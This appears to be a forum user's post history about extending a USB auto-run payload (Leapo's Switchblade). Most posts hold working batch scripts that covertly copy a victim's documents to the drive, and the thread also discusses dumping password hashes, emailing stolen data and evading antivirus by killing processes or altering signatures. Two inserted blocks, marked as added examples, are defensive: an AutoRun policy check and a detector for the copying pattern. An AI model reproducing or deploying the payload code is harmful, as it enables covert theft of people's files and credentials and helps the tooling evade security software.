
DMilton

Active Members
  • Posts

    132

Everything posted by DMilton

  1. It's not a flaw; if you read about how to prevent this kind of attack, you'll notice that one of the first actions to take is disabling the auto-run... It can always be run with a simple double-click... Issue resolved. :P
  2. I had a headache with this... 1.- Check if autorun is enabled on this other PC that doesn't work. 2.- Try to auto-execute go.vbs by double-clicking it from your \SYSTEM dir. It'll surely create the logs correctly if they're enabled. EDIT: For checking the state of auto-play you can run... gpedit.msc, go to "Computer Configuration", "Administrative Templates", "System", double-click on "Turn off Autoplay" and check the state of autoplaying... If you change this value, you must run... gpupdate
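
The autorun check from the posts above, as an added example (not code from the thread or from the payload): it reads `reg query` output for the NoDriveTypeAutoRun value that the "Turn off Autoplay" policy sets, and reports whether AutoRun is still active for removable drives and for CD-ROM drives, the type a U3 CD partition presents as. The sample output and the function names are constructed for illustration, and the code assumes a value in HKEY_LOCAL_MACHINE overrides the one in HKEY_CURRENT_USER.

```python
import re

# Constructed `reg query <key> /v NoDriveTypeAutoRun` output from three hosts.
HARDENED = r'''
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoDriveTypeAutoRun    REG_DWORD    0xff

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoDriveTypeAutoRun    REG_DWORD    0x91
'''
USER_ONLY = r'''
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoDriveTypeAutoRun    REG_DWORD    0x91
'''
PARTIAL = r'''
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer
    NoDriveTypeAutoRun    REG_DWORD    0x95
'''

# A set bit disables AutoRun for that drive type. Only the two types that
# matter for a U3 stick are checked here.
DRIVE_BITS = {"removable": 0x04, "cdrom": 0x20}

HIVE_RE = re.compile(r"^(HKEY_[A-Z_]+)\\")
VALUE_RE = re.compile(r"^\s*NoDriveTypeAutoRun\s+REG_DWORD\s+(0x[0-9a-fA-F]+)\s*$")


def parse_reg_query(text):
    """Return {hive: mask} for every NoDriveTypeAutoRun value in the output."""
    values, hive = {}, None
    for line in text.splitlines():
        key = HIVE_RE.match(line.strip())
        if key:
            hive = key.group(1)
            continue
        value = VALUE_RE.match(line)
        if value and hive:
            values[hive] = int(value.group(1), 16)
    return values


def assess(text):
    """Report which U3-relevant drive types still have AutoRun enabled."""
    values = parse_reg_query(text)
    # Assumption: the machine-wide value wins when both hives carry one.
    mask = values.get("HKEY_LOCAL_MACHINE", values.get("HKEY_CURRENT_USER"))
    if mask is None:
        return {"mask": None, "exposed": None,
                "verdict": "policy not configured, OS default applies"}
    exposed = [name for name, bit in DRIVE_BITS.items() if not mask & bit]
    if exposed:
        verdict = "AutoRun still enabled for: " + ", ".join(exposed)
    else:
        verdict = "AutoRun disabled for removable and CD-ROM drives"
    return {"mask": mask, "exposed": exposed, "verdict": verdict}


if __name__ == "__main__":
    for name, sample in (("hardened", HARDENED), ("user-only", USER_ONLY),
                         ("partial", PARTIAL), ("empty", "")):
        print(name, assess(sample))
```

A mask that sets the removable bit but leaves the CD-ROM bit clear, as in the third sample, still lets a U3 CD partition auto-run.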
  3. Then you have your Safety test checking enabled... I expected this, but... ;) Sorry, you are using the U3 version... in the U3 version, the start.bat is in the CD partition. Then you have to update the CD partition with the new start.bat, modifying the U3.iso file (by updating the start.bat) and using the customizer again. But I still don't know why it doesn't work for you... Sorry...
  4. You can press SHIFT when you insert your USB drive, then autorun will not work for you. Also you can add this to the beginning of the payload to prevent the payload from running on your computer or computers... Edit the \SYSTEM\Start.bat from your USB pocketknife.

     @ECHO off
     CD SYSTEM >NUL
     :: Finds the location of the flash partition and sets master variable.
     IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z:

     Add this simple code:

     @ECHO off
     if %computername% == 'YOURCOMPUTERNAME' goto End
     if %computername% == 'YOUR2NDCOMPUTERNAME' goto End
     if %computername% == 'YOUR3RDCOMPUTERNAME' goto End
     CD SYSTEM >NUL
     :: Finds the location of the flash partition and sets master variable.
     IF EXIST z:\CONFIG\Drive_Location.cfg SET flshdrv=z:

     Do it by adding as many computer names as you own. Obviously, substitute 'YOURCOMPUTERNAME' with your REAL computer name. You can find it by opening a cmd session and typing

     ECHO %COMPUTERNAME%

     One more question... Is safety.txt, as you spell it, in lowercase? The payload checks for this: Safety.txt, and I don't know if VISTA considers safety.txt and Safety.txt as different filenames (Win 2000 and XP don't)... Check it too. Let's see it! If you need some other help... (And I can help you)...
  5. You can see how the files are enabled by looking at the batch but I'll try to show you (mencargo does). The script looks for the existence of some files (IF EXIST %config%\Slurp3.cfg GOTO SetSlurpVars ELSE GOTO SkipSlurpVars). The actual on/off option is a check of existing files in the %config% directory, being on with files such as "Slurp3.cfg" or off with files such as "_Slurp3.cfg". Actually, the batch renames the files using this on/off checking. Other files, such as those used for emailing, are used to set up some variables as Haksaw.cfg does, setting up these variables:

     SET emailfrom=YOUR_EMAIL_HERE@gmail.com
     SET emailto=YOUR_EMAIL_HERE@gmail.com
     SET password=YOUR_PASSWORD_HERE

     In the last version of Leapo's you can do it by saving up to 3 profiles... You can do so, but I have one question on it. Is it not better to contribute to one project than for each one of us to develop his own project? I think team working would be the best, although it's difficult to do... If you have some new additions planned, you can share them by editing the wiki unless you don't want to (I'm sure that is not the case), then everybody can use them in their own payloads. Those passwords you see in clear text are some of those stored in RegKeys, and it uses some already developed Nirsoft utilities. The errors in the code are mainly due to allocating variables for paths that would work in English but may not work in other installation languages or non-standard path installations. If this is your case (didn't you say you're not English? ;) ), you can help in reformatting the code by using the Reliable Paths Method for fixing all the unstable variables (or another method you think better)... I don't know, but you can develop the non-usb payload and, when finished, update the U3 payload... Sorry, no one is ignoring you, but I don't know why, with Safety.txt on the main HDD, the payload runs for you... If you have enabled the checking of Safety.txt in the payload, it would work...

     Try this with the menu.bat:

     1 Manage Settings and Modules
     3 Other Options
     3 Perfom Safety.txt check (it must be enabled)

     The payload looks for "_Safety_Check.cfg" in the CONFIG directory of your drive; if found, then there will not be a safety check. If instead the payload finds "Safety_check.cfg" in the CONFIG directory, it will perform the checking of the Safety.txt in your C:\ and will work for you. Check this for yourself in the CONFIG directory of your USB and tell us what you found there, the "_Safety_Check.cfg" or "Safety_check.cfg" file...
  6. The one we need (really it isn't needed but very useful) is a GUI (better an open source GUI so everyone can understand how it is done) with basically enabling/disabling options for all the payload's stuff. There is a very good GUI from GonZor that did it, but he is not updating his payload and nowadays Leapo's comes with more stuff. Anyway there are many people trying to improve this Leapo's payload. You can see what GonZor's does to understand what is needed; I think it is a very good and easy-to-use GUI. Actually the payload runs basically by looking at the \CONFIG directory to see the state of a multitude (nearly 40) of files. That is, if a file is found, the payload runs a piece of code; if it isn't, it omits the piece of code. Doing a GUI can clean up the code too, not using so many configuration files, but only a few. Once the GUI is started, the need is to change these few files (or parameters) for being used by the start.bat (the payload itself) file, allowing the user to select what will run or not in the next use of the payload. This Leapo's has a GUI itself but it has been made in dos-shell (menu.bat). It is good but a Windows-style GUI will be better.
  7. Don't worry, you are not the only one who doesn't speak English (I'm Spanish). If I can understand you (my English is poorer than yours), everybody can do it! ;) You're welcome. I agree :P Do you mean using only one config file for all the stuff? As in using a general config file? Will this reduce the payload time consumption? No passwords are broken during the functioning of the payload... It only extracts the hashes for further work at our own computer. I think it'll be less suspicious too... ;) I think the best way of publishing it is to publish it here! It's an easy way to help and to let others develop it. :o I think Leapo was working on it but I don't know what his actual progress on it is... Good work, we'll be waiting for your work on this and of course, your contributions cleaning the code, developing new stuff, making it faster, programming a GUI or what you want... :X3N All contributions are good contributions! :alexthedrifter I think so... :P
  8. Then we will be waiting for X3N's response! I have many things on my mind, one of them is making a GUI too, but the problem is the time... When I finish some new stuff I am working on for this payload, I'll study the idea of helping with a GUI... Now you know more than me about Ruby! That was your "Hello world!" button! :P
  9. I think it's a VERY, VERY GOOD idea. I will be waiting for it while doing other things I have in mind... ;) Have you read X3N's posts about a GUI in AutoIT? You can do it at http://hak5.org/forums/index.php?act=findp...&pid=101889 X3N: How far have you got with it? Are you going to publish the code for the GUI?
  10. I have been working on integrating some of the code of the last days (Slurp3 and Recovery Paths Method) into Leapo's payload. (For copying and pasting) into Start.bat. We must create a txt file called wanted.txt in the CONFIG directory of our USB. A file called Slurp3.cfg must be created in the CONFIG directory of our USB. The contents of the wanted.txt file can be, for example (one line for each extension):

     *.txt
     *.doc
     *.xls
     *.xml
     *.jpg

     Once the wanted.txt file has been created or modified, just run the next code. It surely recovers the wanted paths for your Slurp3 desired files (from My Documents, Desktop, Shared Documents and Shared Desktop or any other non-default directories).

     :: By DMilton for free community
     :: Oriented Slurping Method using Recovery Paths Method
     :: Thread http://hak5.org/forums/index.php?showtopic=6746
     :: Checks the state of Slurp3.cfg
     :: Set some variables needed (must be added to initial variables settings).
     :: Note: the ActualUser, Common and TmpReg (Exported Reg Branches and temporary file) have been routed to %temp% path for doing the batch going faster.
     echo off
     set ActualUser="%temp%\ActualUser.dat"
     set Common="%temp%\Common.dat"
     set TmpReg=%temp%\tmpval.dat
     set SlurpDir=%logdir%\Slurp_Data
     set Wanted=%config:"=%wanted.txt
     set /A ValCounter=1
     :: Next lines can be added by example after the variables declaration
     ::Erases temporal files if exists
     if exist %ActualUser% del /S /F /Q /A:- %ActualUser%
     if exist %Common% del /S /F /Q /A:- %Common%
     if exist %TmpReg% del /s /F /Q /A:- %TmpReg%
     :: Exporting keys
     :: It will help to Slurp2 and Slurp3 configuration, then will be a previous comprobation
     IF EXIST %config%\Slurp2.cfg GOTO SetSlurpVars
     IF EXIST %config%\Slurp3.cfg GOTO SetSlurpVars
     GOTO SkipSlurpVars
     :SetSlurpVars
     REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
     REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
     if not %errorlevel%==0 goto error
     :: Creating a temp file containing the desired data
     type %ActualUser% | find "Personal" >> %TmpReg%
     type %ActualUser% | find "Desktop" >> %TmpReg%
     type %Common% | find "Common Documents">> %TmpReg%
     type %Common% | find "Common Desktop">> %TmpReg%
     :: Extracts the necessary lines from tmpval.dat for a further cleaning
     FOR /F "tokens=2* delims==" %%I IN (%TmpReg%) DO set var="%%I"
     if "%var%"=="" goto ErrSetVars
     FOR /F "tokens=2* delims==" %%I IN (%TmpReg%) DO (
     call:FOUND %%I
     )
     :: Deleting temporal files
     del /S /F /Q /A:- %ActualUser%
     del /S /F /Q /A:- %Common%
     del /S /F /Q /A:- %TmpReg%
     goto :Continue
     :FOUND
     :: This routine is called from the extraction keys arguments
     :: It cleans of the path and sets a temp RegKey variable
     SET PP="%~1"
     SET PP=%PP:\\=\%
     SET PP=%PP:"=%
     SET RegKey=%PP%
     :: Assigning variables using ValCounting (counter) and RegKey
     IF %ValCounter%==1 SET MyD=%RegKey%
     IF %ValCounter%==2 SET Dsk=%RegKey%
     IF %ValCounter%==3 SET ShDoc=%RegKey%
     IF %ValCounter%==4 SET ShDsk=%RegKey%
     set /A ValCounter=ValCounter+1
     :ErrSetVars
     :: Causes a break in the code and continues...
     GOTO :EOF
     :Continue
     :: In order to integrate this stuff into Leapo's, the next lines must be added after ":SkipSlurp2"
     IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3
     :StartSlurp3
     :: Creates the directory structure for the wanted files option if not exists
     :: Is useful too for simplifying the Slurp2 routine (not done now).
     :: The directories structure will be created as original, for doing so, we must extract the routes to four variables (We will call them DestMyd, DestDsk, DestShDsk and DestShDoc)
     :ForMyD
     :: This will extract end text of ":..\..\..\..\Name of my Documents folder" (for a depth of 9 sub-directories, I think no more is needed) and return the "Name of my Documents folder" for using it in a variable (DestMyD) used before for creating the same destination folder for "My Documents" or any one other given.
     :: I don't know if this can be done easier (with not so much code), if you can improve it (sure)... please do it!
     :: Of course, another way of creating the destination folders is simply doing so without extracting original ones and calling them simply "My Documents", "Desktop", etc... But I think it is a good thing to have them slurped as in the original folder structure.
     FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%MyD%") DO (
     SET path1=%%j
     SET path2=%%k
     SET path3=%%l
     SET path4=%%m
     SET path5=%%n
     SET path6=%%o
     SET path7=%%p
     SET path8=%%q
     )
     IF "%path1%"=="" SET DestMyD=%USERNAME%_%path1% && goto :ForDsk
     IF "%path2%"=="" SET DestMyD=%USERNAME%_%path1% && goto :ForDsk
     IF "%path3%"=="" SET DestMyD=%USERNAME%_%path2% && goto :ForDsk
     IF "%path4%"=="" SET DestMyD=%USERNAME%_%path3% && goto :ForDsk
     IF "%path5%"=="" SET DestMyD=%USERNAME%_%path4% && goto :ForDsk
     IF "%path6%"=="" SET DestMyD=%USERNAME%_%path5% && goto :ForDsk
     IF "%path7%"=="" SET DestMyD=%USERNAME%_%path6% && goto :ForDsk
     IF "%path8%"=="" SET DestMyD=%USERNAME%_%path7% && goto :ForDsk
     :ForDsk
     :: We do the same for "Desktop" directory, etc...
     FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%Dsk%") DO (
     SET path1=%%j
     SET path2=%%k
     SET path3=%%l
     SET path4=%%m
     SET path5=%%n
     SET path6=%%o
     SET path7=%%p
     SET path8=%%q
     )
     IF "%path1%"=="" SET DestDsk=%USERNAME%_%path1% && goto :ForShDsk
     IF "%path2%"=="" SET DestDsk=%USERNAME%_%path1% && goto :ForShDsk
     IF "%path3%"=="" SET DestDsk=%USERNAME%_%path2% && goto :ForShDsk
     IF "%path4%"=="" SET DestDsk=%USERNAME%_%path3% && goto :ForShDsk
     IF "%path5%"=="" SET DestDsk=%USERNAME%_%path4% && goto :ForShDsk
     IF "%path6%"=="" SET DestDsk=%USERNAME%_%path5% && goto :ForShDsk
     IF "%path7%"=="" SET DestDsk=%USERNAME%_%path6% && goto :ForShDsk
     IF "%path8%"=="" SET DestDsk=%USERNAME%_%path7% && goto :ForShDsk
     :ForShDsk
     FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%ShDsk%") DO (
     SET path1=%%j
     SET path2=%%k
     SET path3=%%l
     SET path4=%%m
     SET path5=%%n
     SET path6=%%o
     SET path7=%%p
     SET path8=%%q
     )
     IF "%path1%"=="" SET DestShDsk=AllUsers_%path1% && goto :ForShDoc
     IF "%path2%"=="" SET DestShDsk=AllUsers_%path1% && goto :ForShDoc
     IF "%path3%"=="" SET DestShDsk=AllUsers_%path2% && goto :ForShDoc
     IF "%path4%"=="" SET DestShDsk=AllUsers_%path3% && goto :ForShDoc
     IF "%path5%"=="" SET DestShDsk=AllUsers_%path4% && goto :ForShDoc
     IF "%path6%"=="" SET DestShDsk=AllUsers_%path5% && goto :ForShDoc
     IF "%path7%"=="" SET DestShDsk=AllUsers_%path6% && goto :ForShDoc
     IF "%path8%"=="" SET DestShDsk=AllUsers_%path7% && goto :ForShDoc
     :ForShDoc
     FOR /F "tokens=1,2,3,4,5,6,7,8* delims=\" %%i IN ("%ShDoc%") DO (
     SET path1=%%j
     SET path2=%%k
     SET path3=%%l
     SET path4=%%m
     SET path5=%%n
     SET path6=%%o
     SET path7=%%p
     SET path8=%%q
     )
     IF "%path1%"=="" SET DestShDoc=AllUsers_%path1% && goto :CreateFolders
     IF "%path2%"=="" SET DestShDoc=AllUsers_%path1% && goto :CreateFolders
     IF "%path3%"=="" SET DestShDoc=AllUsers_%path2% && goto :CreateFolders
     IF "%path4%"=="" SET DestShDoc=AllUsers_%path3% && goto :CreateFolders
     IF "%path5%"=="" SET DestShDoc=AllUsers_%path4% && goto :CreateFolders
     IF "%path6%"=="" SET DestShDoc=AllUsers_%path5% && goto :CreateFolders
     IF "%path7%"=="" SET DestShDoc=AllUsers_%path6% && goto :CreateFolders
     IF "%path8%"=="" SET DestShDoc=AllUsers_%path7% && goto :CreateFolders
     :CreateFolders
     IF NOT EXIST "%SlurpDir%\%DestMyD%" mkdir "%SlurpDir%\%DestMyD%"
     IF NOT EXIST "%SlurpDir%\%DestDsk%" mkdir "%SlurpDir%\%DestDsk%"
     IF NOT EXIST "%SlurpDir%\%DestShDsk%" mkdir "%SlurpDir%\%DestShDsk%"
     IF NOT EXIST "%SlurpDir%\%DestShDoc%" mkdir "%SlurpDir%\%DestShDoc%"
     :: Copying the desired files with the same structure than original
     for /F %%a in (%wanted%) do (
     xcopy "%MyD%\%%a" "%SlurpDir%\%DestMyD%" /H /S /D /C
     xcopy "%Dsk%\%%a" "%SlurpDir%\%DestDsk%" /H /S /D /C
     xcopy "%Dsk%\%%a" "%SlurpDir%\%DestShDsk%" /H /S /D /C
     xcopy "%ShDoc%\%%a" "%SlurpDir%\%DestShDoc%" /H /S /D /C
     )
     ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
     ECHO +----------------------------------+ >> %log% 2>&1
     ECHO + [Wanted files were copied] + >> %log% 2>&1
     ECHO +----------------------------------+ >> %log% 2>&1
     :SkipSlurp3

     For an independent batch (or for a proof of concept of this code), the only thing you need is to declare the config and logdir variables at the beginning of the batch. You can do it by copying and pasting the code to a batch (name it as you want) and adding these two variables to the beginning of it:

     set config="[your usb letter]:\CONFIG\"
     SET logdir=[your usb letter]:\SLURP3

     Note that in the original Leapo's payload, both variables are declared. In Leapo's the logdir is between brackets, it probably will cause some minor bugs, I have tested only the "Proof of Concept" batch. What about integrating this in the next version, Leapo? ;)
  11. That was a good implementation, only a little IF was all that was needed! I vote for updating the Payload! Fantastic, thanks a lot!
  12. Mirror it where you want, mirrors always help...
  13. I have been adding to the wiki this way of assigning variables for further slurping actions and called it Reliable Paths Method.
  14. I think if you have something useful, you must share it. It is the best way of learning... ;) It'll be a good help....
  15. While Leapo is working, let's try going further! ;) Because of my maniacal obsession with making this payload (and any other) run in any language installation, I have done a batch that assigns variables to some paths. Besides, the batch can clean and improve on some variables from the original Leapo's payload that wouldn't work in the next cases: :(

     The user is very "smart" and he thought: If I change my by-default system paths, they won't be able to slurp any of my information!!!
     The system language we want to slurp from is some other, for example: Chinese or Spanish (1st and 2nd languages spoken in the world...), of course English too!

     The script basically gets some registry value keys and assigns variables for the next paths (even if they have been modified): ;)

     MyD for Current User "My Documents" path
     Dsk for Current User "Desktop" path
     ShMyD for Shared "My Documents" for All Users path
     ShDoc for Shared "Desktop" for All Users path

     Leapo: if you are interested in integrating it in your payload, I think it'll be a good way to standardize the payload. Anyway, it is useful in Slurp2 and Slurp3. If you want, I can modify your payload with this stuff and the other stuff posted by me before and post the final code. It can be useful too for slurping non-by-default installation paths for any program by exporting KeyReg values, consulting them and setting the correct variables up. Tested in Windows 2000 and Windows XP, English and Spanish versions. The script takes about a second or less in assigning the variables. <_<

     @echo off
     :: Paths Finder
     :: By DMilton for free community
     :: Thread http://hak5.org/forums/index.php?showtopic=6746
     :: This batch writes variables for using sure paths for My Document, Desktop, My Shared Documents and My Shared Desktop
     :: Creating a set of variables for temp data
     set ActualUser=".\ActualUser.dat"
     set Common=".\Common.dat"
     set TmpReg=".\tmpval.dat"
     set /A ValCounter=1
     ::Erases temporal files if needed
     if exist %ActualUser% del /S /F /Q /A:- %ActualUser%
     if exist %Common% del /S /F /Q /A:- %Common%
     if exist %TmpReg% del /s /F /Q /A:- %TmpReg%
     :: Exporting keys
     REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %Common%
     REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" %ActualUser%
     if not %errorlevel%==0 goto error
     :: Creating a temp file containing the desired data
     type %ActualUser% | find "Personal" >> %TmpReg%
     type %ActualUser% | find "Desktop" >> %TmpReg%
     type %Common% | find "Common Documents">> %TmpReg%
     type %Common% | find "Common Desktop">> %TmpReg%
     :: Extracts the necessary lines from tmpval.dat for a further cleaning
     FOR /F "tokens=2* delims==" %%I IN (.\tmpval.dat) DO set var="%%I"
     if "%var%"=="" goto error
     FOR /F "tokens=2* delims==" %%I IN (.\tmpval.dat) DO (
     call:FOUND %%I
     )
     :: Deleting temporal files
     del /S /F /Q /A:- %ActualUser%
     del /S /F /Q /A:- %Common%
     del /S /F /Q /A:- %TmpReg%
     goto :CONTINUE
     :FOUND
     :: Cleaning of the path and setting temp RegKey variable
     SET PP="%~1"
     SET PP=%PP:\\=\%
     SET PP=%PP:"=%
     SET RegKey=%PP%
     :: Assigning variables using ValCounting (counter) and RegKey
     IF %ValCounter%==1 SET MyD=%RegKey%
     IF %ValCounter%==2 SET Dsk=%RegKey%
     IF %ValCounter%==3 SET ShDoc=%RegKey%
     IF %ValCounter%==4 SET ShDsk=%RegKey%
     set /A ValCounter=ValCounter+1
     :error
     :: Error???? This stuff goes perfectly!!
     GOTO :EOF
     :CONTINUE
     :: Here you can do what you want with the MyD, Dsk, ShDoc and ShDsk variables

     I hope it helps! I'll integrate almost the same for MSN Messenger paths in the next days. Any comments? If someone wants a proof of concept, I'll be glad to do it.
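
A detection sketch for the behaviour the scripts above produce, as an added example (not code from the thread or from the payload): it flags a host where `reg.exe` exports an `Explorer\Shell Folders` key and, shortly afterwards, `xcopy.exe` copies wildcard matches with `/H /S` to a different drive letter. The `time|host|image|command line` record format, the sample records, the 120-second window and all function names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed process-creation records: time|host|image|command line
SAMPLE_LOG = r'''
2008-09-01T10:15:02|WS-014|reg.exe|REG EXPORT "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" "C:\Temp\Common.dat"
2008-09-01T10:15:02|WS-014|reg.exe|REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" "C:\Temp\ActualUser.dat"
2008-09-01T10:15:04|WS-014|xcopy.exe|xcopy "C:\Documents and Settings\alice\My Documents\*.doc" "F:\Slurp_Data\alice_My Documents" /H /S /D /C
2008-09-01T10:15:09|WS-014|xcopy.exe|xcopy "C:\Documents and Settings\alice\Desktop\*.xls" "F:\Slurp_Data\alice_Desktop" /H /S /D /C
2008-09-01T11:00:00|WS-020|xcopy.exe|xcopy "C:\build\*.obj" "C:\backup\build" /S
2008-09-01T11:30:00|WS-031|reg.exe|REG EXPORT "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" "C:\Temp\audit.reg"
2008-09-01T12:00:00|WS-031|xcopy.exe|xcopy "C:\Users\bob\Documents\*.txt" "E:\backup" /H /S
'''


def split_args(cmdline):
    """Split a Windows command line, keeping quoted arguments whole."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmdline)]


def drive_of(path):
    """Return the upper-case drive letter of an absolute path, else None."""
    m = re.match(r"^([A-Za-z]):\\", path)
    return m.group(1).upper() if m else None


def is_shell_folders_export(image, args):
    """reg.exe EXPORT of a key ending in Explorer\\Shell Folders."""
    return (image.lower() == "reg.exe" and len(args) >= 3
            and args[1].lower() == "export"
            and args[2].lower().rstrip("\\").endswith(r"explorer\shell folders"))


def is_bulk_copy_off_drive(image, args):
    """xcopy of a wildcard source with /H and /S to another drive letter."""
    if image.lower() != "xcopy.exe" or len(args) < 3:
        return False
    src, dst = args[1], args[2]
    switches = {a.upper() for a in args[3:] if a.startswith("/")}
    src_drive, dst_drive = drive_of(src), drive_of(dst)
    return ("*" in src and {"/H", "/S"} <= switches
            and src_drive is not None and dst_drive is not None
            and src_drive != dst_drive)


def detect(log_text, window=timedelta(seconds=120)):
    """Return one alert per off-drive bulk copy that follows an export."""
    last_export, alerts = {}, []
    records = sorted(line.strip() for line in log_text.splitlines() if line.strip())
    for record in records:  # ISO timestamps sort chronologically
        ts, host, image, cmd = record.split("|", 3)
        when, args = datetime.fromisoformat(ts), split_args(cmd)
        if is_shell_folders_export(image, args):
            last_export[host] = when
        elif is_bulk_copy_off_drive(image, args):
            seen = last_export.get(host)
            if seen is not None and when - seen <= window:
                alerts.append({"host": host, "time": ts,
                               "source": args[1], "dest": args[2]})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The same-drive build copy on WS-020 and the copy on WS-031 that follows its export by half an hour are not reported; widen `window` if exports and copies are expected to be further apart.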
  16. Try looking for sbowne's post. On his website, he explains in a collection of docs many things about hacking, the solution is possibly in there... The link to his website is: http://samsclass.info/124/124_F08.html#projects and a good doc-link for installing this Leapo's payload is: http://samsclass.info/124/proj2/p14_USB_Switchblade.doc
  17. Maybe it's off-topic, buttttt I did it because I was answering different posts from different people while I was reading them; the probably wrong concept to me is "one post, one answer", it's simply a way of organizing things. No other reason was in it, I don't intend to fill up the forum, nor to be "The One", only "one more"... I'll take your piece of advice in future although I don't understand what the matter with it is! Thanks a lot and excuse me if I did it in a wrong way... You see? I can practise now with it... It's a common problem. Probably the port is closed. I'm not sure but is it a solution to do an inverse VNC connection???
  18. :P I know but now, we have to work on this allusers.txt file to extract the variables to the payload... I don't have plenty of time and I'm working on the other stuff :( , if wanted! When I have some time, I'll go on with this but I think it's a good way to have all the interesting docs in our hands... :o Of course, this is only for pen-tests, developers and administrative issues (such as a security backup of your own system), don't do it without the knowledge of the owner of the system. Don't compromise any system without permission or you will be pursued by law enforcement. <_<
  19. Don't worry, probably I didn't comment the script too much. ;) Modified comments to the script in the post. If you have observed more issues, please, tell us for solving them.
  20. I'm waiting for Leapo's answer and I hope it will be useful for this payload. I haven't incorporated the script into the u3 to test it because of time but with a few little modifications it can run from a batch itself.
  21. It will be very interesting, a good idea but, as Jen said, there are some antivirus programs that are very difficult to kill because they run various processes at a time and detect when a process is shut down; then, the living process starts up the dead process again. The solution may be killing all the processes at one time but, I don't know why, the list of processes starts again in a few seconds in some av. Another viable solution is to modify the detected exes by changing their signatures to bypass the av scan (I did it with OllyDbg), but it must be done by the end user, not by Leapo, because if you publish the new exes they will be detected as a variant of the original in a few days... I did it but I will not publish them (for obvious reasons). ;)
  22. Is someone thinking about a way of recovering not only the actual user account docs but ALL USERS ACCOUNTS? I have some ideas on how to do this but I'll have to squeeze my tiny and poor brain a bit...
  23. If someone can test it, it would be great! By the way I'm planning and working on (if you consider it useful) coding a way to: 1.- Implement a slurp option to xcopy a concrete directory/s or file/s given by the user. Yes, I know it's easy, but it's very late and I have to sleep a bit. 2.- Improve the entire payload by using stored REG key values for installed apps' paths. This will make the payload avoid using fixed path variables (for those who change the default paths) and avoid making an OS language detection.
  24. My mind is busy, then... here is something I have been working on. We can slurp the data with the Slurp2 configuration, but what about slurping certain types of files in the default victim's hdd? I think it is a very good implementation to allow the user to slurp only certain file types such as doc, xlm, xls, txt, jpg, etc. This could be a very good option between Slurp1 (only a few files) and Slurp2 (all the files), depending on the contents we want to slurp, the time we have to do this and the space available in our USB hacking drive. For this purpose, I've done the next code to slurp the desired data contained in the My Documents, Desktop, Shared Desktop and Shared Documents folders. It can be called from the batch looking for the Slurp3.cfg file (Leapo will need to add a menu item for this purpose). :P We can do the attack by editing a plain text file and adding the information we want to slurp, adding as many lines as file types we want to slurp. In the example, the txt file must be edited in the CONFIG directory of our USB and must be called wanted.txt.

     *.txt
     *.doc
     *.xls
     *.xml
     *.jpg

     This example will copy all the files with these extensions to the slurp directory. Also I have added a simple way for the OS language detection and made some improvements in the variables with respect to the paths, for cleaning up the batch a bit and allowing the batch to run correctly in another language installation (Spanish for the moment). The commented batch is the next:

     :: By DMilton for free community
     :: Thread http://hak5.org/forums/index.php?showtopic=6746
     :: Checks the state of Slurp3.cfg
     IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3
     ::Starts an OS language detection for configuring paths (maybe this could be added to set the initial variables), also it can clean the code too...:). Other languages are very simple to implement too.
     :: Detection of ENGLISH OS
     IF EXIST "%HOMEDRIVE%%HOMEPATH%\My Documents\" (
     set MyD=My Documents
     set Dsk=Desktop
     set ShDsk=Shared Desktop
     set ShDoc=Shared Documents
     set MSN=My Received Files
     echo The Operating System language is ENGLISH>> %log% 2>&1
     )
     :: Detection of SPANISH OS (After chinese, the second used language in the world);)
     IF EXIST "%HOMEDRIVE%%HOMEPATH%\Mis Documentos\" (
     set MyD=Mis Documentos
     set Dsk=Escritorio
     set ShDsk=Escritorio Compartido
     set ShDoc=Documentos Compartidos
     set MSN=Mis Archivos Recibidos
     echo The Operating System language is SPANISH>> %log% 2>&1
     )
     :: Sets other variables and paths to clean up pathnames later on
     set SlurpDir=%logdir%\Slurp_Data
     set Wanted=%config%\wanted.txt
     :: Creates the directory structure for the wanted doc option if not exists
     IF NOT EXIST "%SlurpDir%\%MyD%\" mkdir "%SlurpDir%\%MyD%\"
     IF NOT EXIST "%SlurpDir%\%Dsk%\" mkdir "%SlurpDir%\%Dsk%\"
     IF NOT EXIST "%SlurpDir%\%ShDsk%\" mkdir "%SlurpDir%\%ShDsk%\"
     IF NOT EXIST "%SlurpDir%\%ShDoc%\" mkdir "%SlurpDir%\%ShDoc%\"
     IF NOT EXIST "%SlurpDir%\%MSN%\" mkdir "%SlurpDir%\%MSN%\"
     :: Copying the files with the same structure than original looking for extensions at wanted.txt file
     for /F %%a in (%wanted%) do (
     xcopy "%HOMEDRIVE%%HOMEPATH%\%MyD%\%%a" "%SlurpDir%\%MyD%\" /H /S /D /C
     xcopy "%HOMEDRIVE%%HOMEPATH%\%Dsk%\%%a" "%SlurpDir%\%Dsk%\" /H /S /D /C
     xcopy "%ALLUSERSPROFILE%\%Dsk%\%%a" "%SlurpDir%\%ShDsk%\" /H /S /D /C
